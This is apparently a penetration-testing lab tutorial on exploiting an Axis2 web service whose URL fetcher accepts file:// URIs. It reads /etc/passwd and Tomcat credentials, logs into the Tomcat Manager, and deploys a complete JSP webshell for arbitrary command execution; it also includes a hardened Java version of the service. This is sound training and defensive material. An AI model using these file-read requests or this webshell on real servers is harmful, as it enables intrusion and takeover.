Axis2 and Tomcat Manager
Contents
Attacking Axis2
Retrieving information from the WSDL
Calling Axis2 services: the easy way
Calling Axis2 services: the hard way
Java URL class
Conclusion
Introduction
This course details the exploitation of an issue in an Axis2 Web service and how this issue can be used to retrieve arbitrary files. We will then see how an attacker can use it to retrieve the Tomcat users file, access the Tomcat Manager and gain command execution on the server.
$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:88 errors:0 dropped:0 overruns:0 frame:0
          TX packets:77 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:10300 (10.0 KiB)  TX bytes:10243 (10.0 KiB)
          Interrupt:11 Base address:0x8000
In this example the IP address is 10.0.2.15. Throughout the training, the hostname vulnerable is used for the vulnerable machine; you can either replace it with the IP address of the machine, or add an entry with this name and the corresponding IP address to your hosts file. This is easily done by editing: on Windows, your C:\Windows\System32\Drivers\etc\hosts file; on Unix/Linux and Mac OS X, your /etc/hosts file. The IP address can change if you restart the system, so don't forget to update your hosts file.
The Apache and Tomcat servers can be on the same server or on different servers. This can be confusing once you gain command execution on the Tomcat server and realise that its configuration does not match what you see on the Apache side. There are two common ways to "proxy" requests from Apache to Tomcat:
http_proxy: the requests are forwarded to Tomcat using the HTTP protocol;
ajp13: the requests are forwarded to Tomcat using the AJP13 protocol.
The AJP13 configuration is used in this exercise, through the Apache module mod_jk. You should look into CVE-2007-0450 and CVE-2007-1860: these vulnerabilities impact old versions of Tomcat/mod_jk and can potentially allow an attacker to gain access to the Tomcat Manager even if it is not directly exposed by Apache. Here, the page's title gives away that Tomcat is involved in this web stack; however, the HTTP headers only give information on the Apache server in front of it:
% telnet vulnerable 80
Connected to vulnerable.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 26 Dec 2012 08:48:22 GMT
Server: Apache/2.2.16 (Debian)
[...]
Attacking Axis2
Axis2 is a project from the Apache Foundation; it allows developers to create Web services in C and in Java. By default, Axis2 gets deployed in /axis2/ (when developers use axis2.war), and you can easily retrieve a list of the available services by visiting the page http://vulnerable/axis2/services/listServices:
If we did not know that the server was hosting a Web service using Axis2, we could try to use a directory buster like wfuzz to find out. However, wfuzz's default wordlists don't contain axis2, which is why it is always a good idea to keep your own list of paths for common applications and frameworks.
The Web Services Description Language (WSDL) describes the functionality offered by a web service. A WSDL description of a web service (XML based) lists the methods that can be called, what parameters they expect and what values they will return. The WSDL information can be accessed by clicking the service's name in the listServices page or directly using the following URL: http://vulnerable/axis2/services/ProxyService?wsdl. You can find the list of methods by searching for the keyword operation in the portType section of the WSDL. In this file, we can see that only one operation is defined (get):
[...]
<wsdl:portType name="ProxyServicePortType">
    <wsdl:operation name="get">
        <wsdl:input message="tns:getRequest" wsaw:Action="urn:get"/>
        <wsdl:output message="tns:getResponse" wsaw:Action="urn:getResponse"/>
    </wsdl:operation>
</wsdl:portType>
[...]
This operation is defined several times in the file, once for each way it can be accessed. We can see that this get operation takes a tns:getRequest and sends back a tns:getResponse. We are mostly interested in what we need to send to the service.
Above the operation declaration, we can see the message that getRequest uses:
<wsdl:message name="getRequest">
    <wsdl:part name="parameters" element="ns:get"/>
</wsdl:message>
and that this element (ns:get) is declared earlier in the WSDL file with a single parameter named uri, whose type is string:
[...]
<xs:element name="get">
    <xs:complexType>
        <xs:sequence>
            <xs:element minOccurs="0" name="uri" nillable="true" type="xs:string"/>
        </xs:sequence>
    </xs:complexType>
</xs:element>
[...]
Gathering this information is mostly guesswork and depends on the WSDL file generated by a given framework/tool; however, we now have everything we need to call the Web service.
Axis2 provides an easy way to call Web services: you just need to follow the pattern http://[WS_URL]/method?parameters. In our example, we can use this to call our Web service: http://vulnerable/axis2/services/ProxyService/get?uri=https://pentesterlab.com/. We can see that the return value is the homepage of the PentesterLab website.
We can see that this Web service uses the URL provided to retrieve content and echoes it back in the response. The easiest way to do that in Java is the URL class. We can probably use the URL class behaviour to get more than just a website's content... The URL class can also be used as a port scanner if the developer didn't limit the ports you can access. You can try to access http://vulnerable/axis2/services/ProxyService/get?uri=http://localhost:22/ to see what version of OpenSSH is used. The Java URL class is a really handy class that allows a developer to fetch and retrieve content. This class supports the following protocols:
http://
https://
ftp://
file://
...
The first example is the most common use of this class, often as a proxy to retrieve resources and bypass the same origin policy. The file:// scheme is less known and allows an attacker to retrieve arbitrary files on the file system (limited by the application server's privileges). We can exploit this behaviour to retrieve /etc/passwd by accessing the following URL: http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/passwd, and we can see the content of /etc/passwd in the response:
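As an added example (not code from the course, from Axis2 or from PentesterLab), here is the shape of the vulnerable get operation next to a hardened version that validates the URI before the Java URL class ever sees it: only http/https, only the default web ports, and no address that resolves to the server itself or to an internal range. The class and method names are assumptions.

```java
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URI;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Set;

// Hypothetical class written for this note (Java 9+ for Set.of and readAllBytes).
public class SafeProxy {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");
    private static final Set<Integer> ALLOWED_PORTS = Set.of(80, 443);

    // Shape of the vulnerable service: java.net.URL accepts every scheme it has a handler
    // for (http, https, ftp, file, ...) and any port, so the caller chooses what is read.
    public static String getUnchecked(String uri) throws Exception {
        try (InputStream in = new URL(uri).openStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }

    // Hardened: parse first, reject anything outside the allow-list, then fetch.
    public static String getChecked(String uri) throws Exception {
        URI parsed = new URI(uri);
        String scheme = parsed.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase())) {
            throw new IllegalArgumentException("scheme not allowed: " + scheme); // stops file:// and ftp://
        }
        String host = parsed.getHost();
        if (host == null) throw new IllegalArgumentException("no host in URI");
        int port = parsed.getPort() != -1 ? parsed.getPort() : ("https".equalsIgnoreCase(scheme) ? 443 : 80);
        if (!ALLOWED_PORTS.contains(port)) throw new IllegalArgumentException("port not allowed: " + port);
        // Refuse targets that resolve to this server or to internal ranges. The HTTP client
        // resolves the name again, so a production guard should also pin the validated address.
        InetAddress addr = InetAddress.getByName(host);
        if (addr.isLoopbackAddress() || addr.isAnyLocalAddress() || addr.isLinkLocalAddress()
                || addr.isSiteLocalAddress()) {
            throw new IllegalArgumentException("internal address not allowed: " + host);
        }
        HttpURLConnection conn = (HttpURLConnection) parsed.toURL().openConnection();
        conn.setInstanceFollowRedirects(false); // a 3xx from the remote host must not re-target us
        conn.setConnectTimeout(5000); conn.setReadTimeout(5000);
        try (InputStream in = conn.getInputStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }
}
```

With this guard, the file:///etc/passwd and http://localhost:22/ requests shown above are rejected before any file is read or any connection is opened.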
You should try to set up Apache and Tomcat using mod_jk and create a simple Axis2 HelloWorld Web service, or an Axis2 Web service that returns the current time. You can check the configuration of Apache, Tomcat and Axis2 on the ISO to get an idea of how to do it.
<tomcat-users>
    <role rolename="manager-gui"/>
    <user username="tomcat" password="tomcat" roles="tomcat"/>
    <user username="admin" password="s3cret" roles="manager-gui"/>
</tomcat-users>
Debian has its own way of installing most software and tries to put configuration files in /etc. Tomcat installed through Debian's packaging system follows this rule, and the file tomcat-users.xml is stored in /etc/tomcat6/ (for the current version of Debian stable). We can see here that users have a role; this is a really important part of the Manager application, since you will need a user with the role manager (for versions before 6.0.30) or manager-gui (for later versions) to access the manager and deploy an application. Other "manager" roles can also be used, but the deployment is more complex. For example, if you log in as tomcat with the password tomcat, you will get an HTTP 403 response:
By default on Debian, this file can only be read by root and by members of the group tomcat6, but since the directory traversal gives us the same access as the Tomcat server, we can read the content of this file. It's possible to retrieve tomcat-users.xml by accessing the following URL: http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml. You can then retrieve the password of the manager user and access the Tomcat Manager.
Deploying a WebShell
In this section, we are going to see how we can build and deploy a WebShell to gain command execution on the server.
Building a WebShell
To build a WebShell, we need to write it and package it as a war file. The WebShell can be written either as a JSP page or as a Servlet. To keep things simple, we are going to build a JSP WebShell; the following code can be used:
<FORM METHOD=GET ACTION='index.jsp'>
  <INPUT name='cmd' type=text>
  <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if(cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd,null,null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) {
        output += s+"</br>";
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
%>
<pre><%=output %></pre>
We can now create a directory named webshell and put our file (index.jsp) inside it:
$ mkdir webshell
$ cp index.jsp webshell
Now we can build the war file using jar (provided with Java):
$ cd webshell
$ jar -cvf ../webshell.war *
added manifest
adding: index.jsp(in = 579) (out= 351)(deflated 39%)
Our WebShell (webshell.war) is now packaged and we can upload it using the Tomcat Manager.
You just need to click the link to access it and you can start running arbitrary commands:
Conclusion
This exercise explained how to access an Axis2 Web service and how the Java URL class can be used to retrieve arbitrary files if no checks are performed on the protocol in use. Once you can retrieve arbitrary files, you can target configuration files to gather sensitive information and passwords. Once you have credentials, you can easily access the administration interface of the application server and deploy a custom web application to run arbitrary commands on the system.